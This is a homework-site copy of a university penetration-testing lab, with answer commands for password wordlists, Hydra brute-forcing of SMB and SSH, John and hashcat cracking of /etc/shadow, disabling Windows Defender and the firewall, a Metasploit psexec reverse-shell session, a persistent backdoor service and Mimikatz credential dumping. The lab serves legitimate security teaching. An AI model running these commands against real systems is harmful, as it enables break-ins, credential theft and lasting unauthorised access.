Penetration TestingLab - Passwords and Exploits©2020 NYU Tandon School of Engineering©2020 NYU Tandon School of Engineering©2020 NYU Tandon School of EngineeringPassword and Authentication...

Please follow the instruction given in the slide below. When you are completed send me the lab9.lst file. Referencing is not necessary, deadline is flexible too.


Penetration Testing Lab - Passwords and Exploits ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering Password and Authentication Lab Building a dictionary With John the Ripper Using Hydra to guess passwords Dumping Windows Hashes with PSExec exploit + Meterpreter And Mimikatz Exploits Creating a Persistent backdoor Routing through other hosts to attack Note: This lab assumes you have completed the previous Lab and have access to a Windows machine, either VM or host machine You will be making changes to user accounts Labs ©2020 NYU Tandon School of Engineering Building a Password Dictionary list ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering For this lab, we will use an existing password list and make a new password list from it We will try to use a tool to guess the password of the IEUser account If you are using your own Windows instance, you will need to enable SMB Also, create a new user and add a password - "Passw0rd!" WARNING: These passwords lists have profanity in them. If you are offended by vulgar language, you may want to skip this section or avoid looking at the password files (don't cat the raw files) Lab Setup & Goal ©2020 NYU Tandon School of Engineering We will use an existing password file as a seed for our new list /usr/share/wordlists/nmap.lst Inspect the wordlist with cat We can pipe it right into pw-inspector We can also use '-i' to read in a file Use pw-inspector to print passwords At least 6 characters long but no more than 10 characters Uses at least 2 of the following three categories: lowercase, uppercase, numbers Create a new dictionary file called lab9.lst with the following rules Between 8-10 characters Must use upper and lower case characters Making a dictionary with pw-inspect ©2020 NYU Tandon School of Engineering Use pw-inspector to print passwords At least 6 characters long but no more than 10 characters Uses at least 2 of the following 3 categories: lowercase, uppercase, numbers # cat nmap.lst | pw-inspector -m 6 -M 10 -l -u -n -c 2 Create a new dictionary file called lab9.lst with the following rules Between 8-10 characters Must use upper and lower case characters # cat nmap.lst | pw-inspector -m 8 -M 10 -l -u > lab9.lst Making a dictionary with pw-inspect Answer ©2020 NYU Tandon School of Engineering John the Ripper is a multi-purpose tool for password cracking We can also use it to help mangle our passwords We will cover more of this tool the following week If we just call "john" from the command line, it will show us options John the Ripper ©2020 NYU Tandon School of Engineering Cat our new password file. Pretty short! Clear the screen # clear Try the following command: # john --wordlist:./lab9.lst --rules:single --stdout This command will call John pass it our new wordlist specify a mangling rule 'single' tell it to print to stdout We can get a list of all rules available with # john --list=rules John the Ripper - for password mangling ©2020 NYU Tandon School of Engineering Using our small seed file and john, use a rule that mangles the dictionary entries into various forms of "leetspeak " Converts i -> 1 e -> 3 etc... Hint: uS1N' 0UR sm4Ll S33d F1L3 4nD J0Hn, UZ3 4 RUL3 TH@ m4NGl3z T3H d1cT10N4RY 3NTR13z 1nT0 v4R10Uz F0rMZ 0F l33t sp33k John the Ripper - for password mangling ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering Using our small seed file and john, use a rule that mangles the dictionary entries into various forms of leetspeak # john --wordlist:./lab9.lst --rules:l33t --stdout >> lab9.lst John the Ripper - for password mangling Answer ©2020 NYU Tandon School of Engineering Password Guessing with Hydra ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering You may have to go into the Windows Network Settings and enable File and Print Sharing It depends on what kind of network connection you select Public needs to be manually enabled Setup ©2020 NYU Tandon School of Engineering You will need to enable SMBv1 Use the "Turn Windows Features..." panel Confirm with nmap if needed Setup ©2020 NYU Tandon School of Engineering Also, if this is the VM, you will already have the firewall disabled If you disable it from your host system, make sure to enable it after the lab Setup ©2020 NYU Tandon School of Engineering Refer again to our options, run hydra # hydra Review the options and example on the bottom of the screen right Use hydra with our new lab9.lst dictionary to attack the smb server of the Windows target Once that completed, try it again but by using the 'xhydra' GUI tool Hint: You will not need to specify options such as port. By specifying a service, hydra automatically provides settings Hydra for guessing passwords ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # hydra -l IEUser -P lab9.lst smb://10.10.0.5 Hydra for guessing passwords Answers An ©2020 NYU Tandon School of Engineering Hydra for guessing passwords Answers An ©2020 NYU Tandon School of Engineering Now let's see how noisy password guessing can be Start your Kali Linux SSH server # service ssh start We can verify that it is running # service ssh status # nmap -n 127.0.0.1 -p 22 Create a new user Alice # adduser alice Change her password to 'Passw0rd!' # passwd alice Open a new Terminal window Print the recent auth logs and follow them # tail -f /var/log/auth.log Password guessing noise - demonstrated Setup ©2020 NYU Tandon School of Engineering Run hydra against the local machine to guess alice's ssh password 127.0.0.1 Service - ssh User - alice Use the same dictionary file, lab9.lst As you do this, watch the log window we setup! Password guessing noise - demonstrated ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # hydra -l alice -P lab9.lst ssh://127.0.0.01 Many system logs about failed authentication It is VERY OBVIOUS that someone is trying to guess the password! Password guessing noise - demonstrated ©2020 NYU Tandon School of Engineering Password Cracking ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering For this lab, we will create some users on our Kali VM and then try to crack their passwords We will use the nmap.lst wordlist On your Kali machine, add the following users and passwords # adduser alice spongebob # adduser bob junior56 # adduser charlie Liv3rp00l # adduser dan $ofTBa11!999 Password Cracking ©2020 NYU Tandon School of Engineering Use john against the shadow file to try and crack the passwords Use a simple wordlist mode with nmap.lst Repeated with our mangled wordlist, lab9.lst John ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # john --wordlist=/usr/share/wordlists/nmap.lst /etc/shadow # john --wordlist=./lab9l33t.lst /etc/shadow John Answer ©2020 NYU Tandon School of Engineering The input for hashcat is a bit different We can't just pass it the shadow file ERROR: First, extract just the hashes from the shadow file Don't use a text editor Do use bash commands and tools such as grep and awk Write the contents to a file, hashes.lst Hashcat ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # cat /etc/shadow | grep '\$' | awk -F':' '{print $2 }' > hashes.lst Hashcat - awk solution ©2020 NYU Tandon School of Engineering Next, use hashcat in hybrid wordlist + mask to attack the hashes wordlist = nmap.lst mask = two digits Force it to run if it cannot use GPU (virtualized Kali) output should be to a file called hashes.out OPTIONAL: To speed up this lab, shorten the standard nmap.lst Pull out the entries that contain the string "juni" into a shorter list in your working directory # cat /usr/share/wordlists/nmap.lst | grep 'juni' > nmap_short.lst Hashcat ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # hashcat -a 6 -m 1800 hashes.lst nmap_short.lst ?d?d --force -o hashes.out Hashcat ©2020 NYU Tandon School of Engineering Use a combination of either John, hashcat, to try and get the last password Assume that we have a hint: Dan loves softball more than anything With "softball" as a seed, what is one way to mangle this to make a wordlist? You could use john rulesets such as l33t, add digits and case shifts using hashcat Read documentation and practice each. Try to crack it The last password ©2020 NYU Tandon School of Engineering Dumping Windows hashes - PSExec ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering For this lab, we will use a meterpreter session on the Windows target to get hashes and practice some password cracking techniques Metasploit - Meterpreter Lab ©2020 NYU Tandon School of Engineering Windows Open up an Administrative command shell Make a registry change to allow for psexec to execute files C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f Disable Firewall C:\> netsh advfirewall set allprofiles state off Open up an Administrative PowerShell Disable Windows Defender PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true Metasploit - Meterpreter Getting Hashes Setup Se ©2020 NYU Tandon School of Engineering We will use the metasploit database, so make sure postgresql is started and the msfdb is initialized Start metasploit you can check status of the database with 'db_connect' and 'db_status' Load an exploit that works with Windows against smb sessions, if you have a username and password, with psexec Set all required options to use the exploit Set a payload for a reverse tcp meterpreter session Metasploit - Meterpreter Getting Hashes ©2020 NYU Tandon School of Engineering Spoiler ahead ©2020 NYU Tandon School of Engineering # msfconsole msf > use exploit/windows/smb/psexec msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(psexec) > set RHOST 10.10.0.5 msf exploit(psexec) > set SMBPass Passw0rd! msf exploit(psexec) > set SMBUser IEUser msf exploit(psexec) > set LHOST 10.10.0.10 msf exploit(psexec) > exploit meterpreter > Metasploit - Meterpreter Getting Hashes Answer ©2020 NYU Tandon School of Engineering Now that we have a Meterpreter session, let's try some basic commands Check our user meterpreter > getuid Even though we are already System, there still might be some privileges to get There are configurations which can limit system or admin accounts Gain more privileges meterpreter > getprivs Hashdump has been deprecated, replaced with smart_hashdump meterpreter > run post/windows/gather/smart_hashdump You can also see it updated the loot table Send our session to the background meterpreter > background Check our loot table msf > loot We will attack these hashes in another lab Metasploit - Meterpreter Getting Hashes ©2020 NYU Tandon School of Engineering Persistent Backdoor Service ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering This next lab will pick up right where we left off Still using the psexec exploit, we will dive into more settings and create a persistent backdoor If the VM gets shut down or restarts, we will not need to exploit PSExec again, we only need to create a listener! Metasploit - Meterpreter Getting Hashes ©2020 NYU Tandon School of Engineering By default, after exploit, we can see what process meterpreter is in meterpreter > ps Lists processes meterpreser > getpid Shows all processes Check out some advanced options of the exploit msf exploit(psexec) > show advanced Interesting stuff here, including SERVICE_PERSIST Set it to true msf exploit(psexec) > set SERVICE_PERSIST true Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering This will create a persistent service on the target machine By default, it will create it with some random characters but we can define it Make it more stealthy! Set those values to whatever you want for this lab, then exploit Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering Look at the Windows task manager, services tab Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering Even though we created a persistent service to reconnect to us, we need to also create a listener! Set a new exploit, a multi-handler msf > use exploit/multi/handler Set the payload msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp Check your options LPORT = 4444 LHOST = 10.10.0.10 Exploit but send to the background msf exploit(handler) > exploit -j It will listen for incoming connections! Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering Close all current sessions msf > sessions -K Check the current job msf > jobs We can see that there are no more sessions but our multi-handler is listening... Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering Power down and restart the VM If you are using your own Windows client, you could just manually start the service Watch your metasploit console As Windows starts back up, the service runs! The multi-handler gets the backdoor reverse_tcp connection request and successfully sends over the Meterpreter stage We now have a new meterpreter session on a freshly booted Windows machine Our job ended Metasploit - Meterpreter Getting Hashes psexec settings ©2020 NYU Tandon School of Engineering Mimikatz & Ophcrack ©2020 NYU Tandon School of Engineering ©2020 NYU Tandon School of Engineering In the existing meterpreter session, load Mikikatz! meterpreter > load kiwi meterpreter > creds_all We can see what other commands we can do with ? meterpreter > ? Metasploit - Meterpreter Getting Hashes Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerberos Retrieve Kerberos creds (parsed) creds_msv Retrieve LM/NTLM creds (parsed)
Apr 05, 2023
SOLUTION.PDF

Get Answer To This Question

Related Questions & Answers

More Questions »

Submit New Assignment

Copy and Paste Your Assignment Here